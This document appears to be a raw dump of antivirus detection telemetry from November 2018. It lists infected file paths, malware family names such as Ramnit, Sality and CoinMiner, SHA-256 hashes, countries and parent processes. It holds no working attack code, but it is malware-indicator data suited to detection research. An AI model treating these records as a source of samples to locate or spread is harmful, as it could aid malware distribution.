  Row(detection=Row(filename='steam_api.dll', filepath='C:\\Games\\AlienShooterTD\\steam_api.dll', filesize=64000, name='TR/Crypt.ULPM.Gen2.#M300.#R100794'), hash='fb07edadce470c3afe99bd389001bfb9adbc709a60f5e517bfc0ee739e21f492', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Games\\AlienShooterTD\\AlienShooterSteam.exe', parentsize=3027600, timestamp='2018-11-04T13:45:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:00:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:44:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tcmdlzma.dll', filepath='C:\\Program Files\\Total Commander\\TCMDLZMA.DLL', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='fc3085f8775dae313873e36020380939eb9c8cd52ea345f665e0955fb04bd209', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:58:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-215955-4ba06c34', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8076cd85\\AVSCAN-20181031-190013-AB75577F\\AVSCAN-20181031-215955-4BA06C34', filesize=80000, name='TR/Ghokswa.jlssq.#M1.#R1'), hash='fa0ef7cb9d547661d7f48dca8bd1d69c570339caf685aeb3a79b29356344437e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T01:00:00Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='avscan-20181102-215438-7496f7cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24d607a4\\AVSCAN-20181102-215410-7151B390\\AVSCAN-20181102-215438-7496F7CB', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:54:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161722-5e11a072', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-161538-52C9C851\\AVSCAN-20181102-161722-5E11A072', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:17:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qualcomm+premium+tool+v24.exe', filepath='C:\\Users\\X\\Downloads\\Qualcomm+Premium+Tool+v24.exe', filesize=2624000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='23f1dc5ebee68a180146fb4cada07dcaad2bbb9822292da223112bb2dbc2b8e7', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T14:21:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wwihist.dll', filepath='E:\\plc corse\\PLC_SCADA_HMI_AC DRIVE\\SCADA\\Wonderware Intouch\\Wonderware Intouch\\INTOUCH 10\\InTouch\\wwihist.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='59be20258372eabc0d5eb927dd8fb61e7cc44c35d5566f1ce8510d07c17c8960', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=337520, timestamp='2018-11-02T10:59:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-143051-400a18c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4d4b5374\\AVSCAN-20181102-143025-3ACFD805\\AVSCAN-20181102-143051-400A18C8', filesize=128000, name='X2000M/Agent.6489234.#M1.#R1'), hash='1899d4d9c91fcb27d40e5323532cda1136d9eb1526a5e0591d4ba733d9f3b624', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:30:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\PROGRAM FILES\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-02T21:15:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T03:34:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3711816, timestamp='2018-11-02T22:17:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:09:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Music\\\\\\\\1.vbs\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-02T03:39:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:31:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194934-a04aed9c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_759cb39a\\AVSCAN-20181102-194908-9B175095\\AVSCAN-20181102-194934-A04AED9C', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:49:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T17:45:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='openal32.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\.minecraft\\versions\\Dark Light Client 1.8\\natives\\OpenAL32.dll', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='600d63c03b1447756de18eb1fb6e95c4b31af78b082567001416de20d838e3ad', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:34:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T16:38:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='csrss.exe', filepath='\\\\?\\C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:12:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='optsatadc.dll', filepath='C:\\Windows\\SysWOW64\\optsatadc.dll', filesize=384000, name='TR/Stantinko.Gen.#M300.#R8142'), hash='1572407c94033e0435af07264e253f7264828b753899e8656e71be737ecce748', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:13:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T20:00:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155743-de768bce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155743-DE768BCE', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:57:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion[2].dll', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\J5RS8X0B\\Fusion[2].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline='aeinv.dll,UpdateSoftwareInventory', country='AT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=51200, timestamp='2018-11-02T19:08:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='05fc403cfe21604b31ad3a635209320126c73c7986ba605c8d8f081b0cbc781e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.available\\Avira\\05FC403CFE21604B31AD3A635209320126C73C7986BA605C8D8F081B0CBC781E', filesize=180000, name='W32/Elkern.B.#M1.#R1'), hash='05fc403cfe21604b31ad3a635209320126c73c7986ba605c8d8f081b0cbc781e', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T11:03:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-182144-a15f02a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_98d4435e\\AVSCAN-20181102-181915-8E4EB9F0\\AVSCAN-20181102-182144-A15F02A9', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T10:21:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='s01.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\s01\\s01.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-030556-e15c6155', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-030556-E15C6155', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='30e1137f37f4c90814e8b85325d0453b172e8df5e31c256975fe6225a448a358', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:07:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xpddm.dll', filepath='\\\\?\\C:\\orant\\BIN\\XPDDM.DLL', filesize=320000, name='W32/Ramnit.CD.#M1.#R1'), hash='23b0f6656ea0071ca70c1a63498bd3ffcc69ee48893c62f941d76753695186ba', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:11:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fodar', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fodar', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='35d68f729ac3beb6920e8a8f9bd7a7ee7fb5ef5ac1761d2d1f86d580d9c4e9e0', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:11:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='96b8b4ae05e271ced86574bc82205fb579e573e3', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\96b8b4ae05e271ced86574bc82205fb579e573e3', filesize=2112000, name='ADWARE/DealPly.Gen.#M1.#R1'), hash='0779a49a14dee81c178e8dd585b31ce7e83f1593b664132aa48c905a204be939', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:31:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ssopen.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Samsung\\Samsung CLX-6260 Series\\Setup\\Setup\\bin\\SSOpen.exe', filesize=72000, name='TR/Trash.Gen.#M1.#R1'), hash='203be6e7901a91e052b8b3827d2758d3b79d53d7eee101fd7846d4c2ea0b191d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:01:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T00:25:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130946-82556cfc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-130946-82556CFC', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:12:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='diehard.exe', filepath='D:\\أفلام أجنبي\\العاب\\حرب مسدسات\\DIEHARD.EXE', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='729b18da30c0363f4b8c6ac3d53bb143e4fec1017e387b3c0c2ac68fbe74b892', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T11:46:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053121-804b57b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053121-804B57B3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-02T17:24:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-145544-1faafad3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-145544-1FAAFAD3', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:58:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055650-0fb07039', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055650-0FB07039', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:49Z'), dt=datetime.date(2018, 11, 2)),
